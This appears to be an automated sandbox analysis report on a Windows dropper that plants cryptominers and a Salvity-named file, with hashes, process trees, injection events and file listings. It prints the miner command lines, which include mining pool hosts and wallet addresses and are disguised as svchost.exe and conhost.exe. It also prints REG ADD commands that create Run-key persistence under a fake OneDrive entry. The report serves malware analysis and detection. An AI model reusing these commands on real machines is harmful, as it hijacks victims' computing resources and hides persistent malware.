Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
04-05-2022 08:14
Static task
static1
Behavioral task
behavioral1
Sample
68e7a0fa9f7dbbb34bc4bad97690ea72.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
68e7a0fa9f7dbbb34bc4bad97690ea72.exe
Resource
win10v2004-20220414-en
General
-
Target
68e7a0fa9f7dbbb34bc4bad97690ea72.exe
-
Size
5.6MB
-
MD5
d9079709c37a9977a75123a38cbd6660
-
SHA1
0f7af4f8fe342afc826d5b6a7ffb0c145b371c50
-
SHA256
b6a3b9630a6ed8f626b7fdc083c73a03c57923c1055314bacaa49031c5fa6ae3
-
SHA512
a6d3992a6842d4433d3ce46439b14e02de34929309263ff08d4e7a561a52210a886a146afc3579aa44c28a528fc798c6c615543a805212bc382e4e7141c842bd
Malware Config
Signatures
-
XMRig Miner Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/5036-165-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/5036-166-0x000000014034CF44-mapping.dmp xmrig behavioral2/memory/5036-167-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/5036-168-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/5036-170-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig -
Executes dropped EXE 3 IoCs
Processes:
[New]1.exeOneDrive.exe[New]Salvity_crypted(2).exepid process 768 [New]1.exe 2992 OneDrive.exe 4956 [New]Salvity_crypted(2).exe -
Processes:
resource yara_rule behavioral2/memory/3696-162-0x0000000140000000-0x0000000142B59000-memory.dmp upx behavioral2/memory/3696-164-0x0000000140000000-0x0000000142B59000-memory.dmp upx -
Loads dropped DLL 1 IoCs
Processes:
OneDrive.exepid process 2992 OneDrive.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
REG.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Software\Microsoft\Windows\CurrentVersion\Run REG.exe Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" REG.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 22 ip-api.com 5 ipinfo.io -
Suspicious use of SetThreadContext 4 IoCs
Processes:
[New]1.exe[New]Salvity_crypted(2).exeOneDrive.exedescription pid process target process PID 768 set thread context of 2504 768 [New]1.exe AppLaunch.exe PID 4956 set thread context of 4536 4956 [New]Salvity_crypted(2).exe AppLaunch.exe PID 2992 set thread context of 3696 2992 OneDrive.exe svchost.exe PID 2992 set thread context of 5036 2992 OneDrive.exe conhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
AppLaunch.exeOneDrive.exepid process 2504 AppLaunch.exe 2504 AppLaunch.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe 2992 OneDrive.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 668 -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
AppLaunch.execonhost.exedescription pid process Token: SeDebugPrivilege 4536 AppLaunch.exe Token: SeLockMemoryPrivilege 5036 conhost.exe Token: SeLockMemoryPrivilege 5036 conhost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
conhost.exepid process 5036 conhost.exe -
Suspicious use of WriteProcessMemory 58 IoCs
Processes:
68e7a0fa9f7dbbb34bc4bad97690ea72.exe[New]1.exeAppLaunch.exe[New]Salvity_crypted(2).exeOneDrive.exedescription pid process target process PID 5020 wrote to memory of 768 5020 68e7a0fa9f7dbbb34bc4bad97690ea72.exe [New]1.exe PID 5020 wrote to memory of 768 5020 68e7a0fa9f7dbbb34bc4bad97690ea72.exe [New]1.exe PID 5020 wrote to memory of 768 5020 68e7a0fa9f7dbbb34bc4bad97690ea72.exe [New]1.exe PID 768 wrote to memory of 2504 768 [New]1.exe AppLaunch.exe PID 768 wrote to memory of 2504 768 [New]1.exe AppLaunch.exe PID 768 wrote to memory of 2504 768 [New]1.exe AppLaunch.exe PID 768 wrote to memory of 2504 768 [New]1.exe AppLaunch.exe PID 768 wrote to memory of 2504 768 [New]1.exe AppLaunch.exe PID 2504 wrote to memory of 2992 2504 AppLaunch.exe OneDrive.exe PID 2504 wrote to memory of 2992 2504 AppLaunch.exe OneDrive.exe PID 2504 wrote to memory of 5056 2504 AppLaunch.exe REG.exe PID 2504 wrote to memory of 5056 2504 AppLaunch.exe REG.exe PID 2504 wrote to memory of 5056 2504 AppLaunch.exe REG.exe PID 2504 wrote to memory of 4424 2504 AppLaunch.exe REG.exe PID 2504 wrote to memory of 4424 2504 AppLaunch.exe REG.exe PID 2504 wrote to memory of 4424 2504 AppLaunch.exe REG.exe PID 5020 wrote to memory of 4956 5020 68e7a0fa9f7dbbb34bc4bad97690ea72.exe [New]Salvity_crypted(2).exe PID 5020 wrote to memory of 4956 5020 68e7a0fa9f7dbbb34bc4bad97690ea72.exe [New]Salvity_crypted(2).exe PID 5020 wrote to memory of 4956 5020 68e7a0fa9f7dbbb34bc4bad97690ea72.exe [New]Salvity_crypted(2).exe PID 4956 wrote to memory of 4536 4956 [New]Salvity_crypted(2).exe AppLaunch.exe PID 4956 wrote to memory of 4536 4956 [New]Salvity_crypted(2).exe AppLaunch.exe PID 4956 wrote to memory of 4536 4956 [New]Salvity_crypted(2).exe AppLaunch.exe PID 4956 wrote to memory of 4536 4956 [New]Salvity_crypted(2).exe AppLaunch.exe PID 4956 wrote to memory of 4536 4956 [New]Salvity_crypted(2).exe AppLaunch.exe PID 2992 wrote to memory of 3696 2992 OneDrive.exe svchost.exe PID 2992 wrote to memory of 3696 2992 OneDrive.exe svchost.exe PID 2992 wrote to memory of 3696 2992 OneDrive.exe svchost.exe PID 2992 wrote to memory of 3696 2992 OneDrive.exe svchost.exe PID 2992 wrote to memory of 3696 2992 OneDrive.exe svchost.exe PID 2992 wrote to memory of 3696 2992 OneDrive.exe svchost.exe PID 2992 wrote to memory of 3696 2992 OneDrive.exe svchost.exe PID 2992 wrote to memory of 3696 2992 OneDrive.exe svchost.exe PID 2992 wrote to memory of 3696 2992 OneDrive.exe svchost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe PID 2992 wrote to memory of 5036 2992 OneDrive.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\68e7a0fa9f7dbbb34bc4bad97690ea72.exe"C:\Users\Admin\AppData\Local\Temp\68e7a0fa9f7dbbb34bc4bad97690ea72.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\[New]1.exeC:\Users\Admin\AppData\Roaming\[New]1.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe --algo TON --pool wss://pplns.toncoinpool.io/stratum --user EQBZuEsYhQdC0eJyDaytj4QjfzlC1XcVmaMoUYS1XcFe8Sg3.Boba5⤵
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe -o xmr.2miners.com:2222 -u 45wBqXGMbXaX8NMdEUKLMehgJXU16Tc6Mi1tcmZdHvCPjXSD7xzE2VGjJmbbq4Mh7U5hs95LWWzfB9ZoUYYoYXGa9o1zH8G -p "Boba"5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\REG.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe4⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Windows\SysWOW64\REG.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 0200000000000000000000004⤵
- Modifies registry key
-
C:\Users\Admin\AppData\Roaming\[New]Salvity_crypted(2).exeC:\Users\Admin\AppData\Roaming\[New]Salvity_crypted(2).exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157Filesize
4KB
MD5f7dcb24540769805e5bb30d193944dce
SHA1e26c583c562293356794937d9e2e6155d15449ee
SHA2566b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea
SHA512cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157Filesize
340B
MD59265e18faf613b53a484849116992c56
SHA10cfe028224b0ab7165dcd56e9e853b0aac9137a4
SHA2569c57b1d641b4a0160f5f62ac767f98a89e0f1c1679902d6b043226122f56f555
SHA5121876edc68431190c1382832c05ce7ebb58c836d147c532653d0da4c788af53e88977bac831b11daeb26a5ec70d6b13eb0f428783cab4d2a641a3385d498d18e8
-
C:\Users\Admin\AppData\Local\Microsoft\0F6QG06K4i2jeH_sFilesize
233B
MD52ca3c0e2a78754c1c97bcebf1409c513
SHA192ca53ce14553ab4875fceb79421f9f1e740038b
SHA25681e75ebb0ed07c375d4b37ba941321ae01f307f428198fe8aff860465879d39d
SHA5127e18d166702d634885c7a0734c4f7c9f19a429e8c41eafd6f41326c8db786cb270b50fa94045adddd79f94bf73b2fc40ed2bdf6cee55fed5052054ad011f61af
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exeFilesize
175KB
MD5f3af73070387fb75b19286826cc3126c
SHA17774854137d7ada89f3b4bdf67631456a1e74853
SHA256974243f2487ceeb8eeea6aa8fee215f15c7b204382d4bd12f469f712f56c3610
SHA512a620583b2d89e3f0350ae4d5dfe2b2c160d2f982b29dea6b8e273bb39ab2d1d91a2452238e9c30cdd7151aa555e231e1ac9930f9d76f6ff80504eacb25fa557a
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Secur32.dllFilesize
316KB
MD5fed6517a5f84eecc29edee5586d7feeb
SHA156df244bf73c7ec7b59c98e1f5d47b379b58a06b
SHA2565075a0587b1b35c0152d8c44468641d0ab1c52fd8f1814ee257eceb9ffcb89b6
SHA51245cab4395d509b5d7dfb904e84d5a679440412f494c4970191b5882572f4d1b9c9cd28d41a49619353c405c2477153b4a7a1568fcf307709df0b81b38c405642
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Secur32.dllFilesize
316KB
MD5fed6517a5f84eecc29edee5586d7feeb
SHA156df244bf73c7ec7b59c98e1f5d47b379b58a06b
SHA2565075a0587b1b35c0152d8c44468641d0ab1c52fd8f1814ee257eceb9ffcb89b6
SHA51245cab4395d509b5d7dfb904e84d5a679440412f494c4970191b5882572f4d1b9c9cd28d41a49619353c405c2477153b4a7a1568fcf307709df0b81b38c405642
-
C:\Users\Admin\AppData\Roaming\[New]1.exeFilesize
211.8MB
MD5353f4e062d724170670c180ebd99820b
SHA1c97f5f21a9bf52876fd30e1c3254105f3d0acac8
SHA2560333131dd30196be60dcc7bf5bd9f2c5070b06377653ac0748f7d28e9ddfd5b2
SHA512d9de44f50021d39b98a48a99c046c4a427358ae9ec867cd62c53fff51ae6a335747aab813abfb71f0d9a64d76321c31e3e031b9c4899f40f004020f1889fb861
-
C:\Users\Admin\AppData\Roaming\[New]1.exeFilesize
223.4MB
MD50f2e8a1d69c040f24c4c21dc8b365390
SHA117b4f6174c53e6efd153c9fe29e4170ed74a9baf
SHA25686a1c77ac544648e7c7c6d7bed7c1e3a016d5b6cbc8ca558143321fcb5af4bf0
SHA5129b36e54c7a99987ff342c902fcee3770c3708ab6121555deba4a054eaeea688d3e04e0aead13e08bb99fc643d6e13a7dbb07575aee800e0bcdebe0cbbc3b2cf9
-
C:\Users\Admin\AppData\Roaming\[New]Salvity_crypted(2).exeFilesize
138.2MB
MD50eb8e4c1891bd0e29ea983719de3f2a0
SHA1c44f9134d5df8ef90d6382db624c15a179d9c1bb
SHA2567ec35f7110093b4f5c8916592d0a86cb180c8e845e6c3238674369d7cc6e2e6f
SHA512eec59ee50b3bcdfdeb92ce51db931e701480bb8e6a9dee424c5dedb6bd2e392b414e46fc6cf26f3e9fd557f912399a7c09ca025f893ac16b71258011be81f099
-
C:\Users\Admin\AppData\Roaming\[New]Salvity_crypted(2).exeFilesize
150.6MB
MD5215aba8041ae5110f18339823faae566
SHA102d04e2ca8599de186bc63088c00e395b0624c05
SHA25600fc243f61d287848e20eb9e4c2b4c91949c5fc40b8f35fd61519ad5fe30231f
SHA5124036591f963150fffd2f63a00c2e75acf2aad226dc169d22fd339e9a3336ac7f011a3f97903b99f44639e3552ede50de835ebc4540541f81333d968609ed3331
-
memory/768-130-0x0000000000000000-mapping.dmp
-
memory/2504-140-0x0000000000400000-0x00000000004CA000-memory.dmpFilesize
808KB
-
memory/2504-133-0x0000000000000000-mapping.dmp
-
memory/2504-134-0x0000000000400000-0x00000000004CA000-memory.dmpFilesize
808KB
-
memory/2992-141-0x0000000000000000-mapping.dmp
-
memory/3696-163-0x0000000142B56500-mapping.dmp
-
memory/3696-164-0x0000000140000000-0x0000000142B59000-memory.dmpFilesize
43.3MB
-
memory/3696-162-0x0000000140000000-0x0000000142B59000-memory.dmpFilesize
43.3MB
-
memory/4424-146-0x0000000000000000-mapping.dmp
-
memory/4536-154-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/4536-153-0x0000000000000000-mapping.dmp
-
memory/4536-159-0x00000000053F0000-0x0000000005456000-memory.dmpFilesize
408KB
-
memory/4536-160-0x0000000006430000-0x00000000069D4000-memory.dmpFilesize
5.6MB
-
memory/4536-161-0x0000000005F60000-0x0000000005FF2000-memory.dmpFilesize
584KB
-
memory/4956-150-0x0000000000000000-mapping.dmp
-
memory/5036-167-0x0000000140000000-0x00000001407DD000-memory.dmpFilesize
7.9MB
-
memory/5036-165-0x0000000140000000-0x00000001407DD000-memory.dmpFilesize
7.9MB
-
memory/5036-166-0x000000014034CF44-mapping.dmp
-
memory/5036-168-0x0000000140000000-0x00000001407DD000-memory.dmpFilesize
7.9MB
-
memory/5036-169-0x0000019AFD980000-0x0000019AFD9A0000-memory.dmpFilesize
128KB
-
memory/5036-170-0x0000000140000000-0x00000001407DD000-memory.dmpFilesize
7.9MB
-
memory/5036-171-0x0000019AFF2A0000-0x0000019AFF2E0000-memory.dmpFilesize
256KB
-
memory/5036-172-0x0000019AFD9E0000-0x0000019AFDA00000-memory.dmpFilesize
128KB
-
memory/5036-173-0x0000019AFF2E0000-0x0000019AFF300000-memory.dmpFilesize
128KB
-
memory/5056-143-0x0000000000000000-mapping.dmp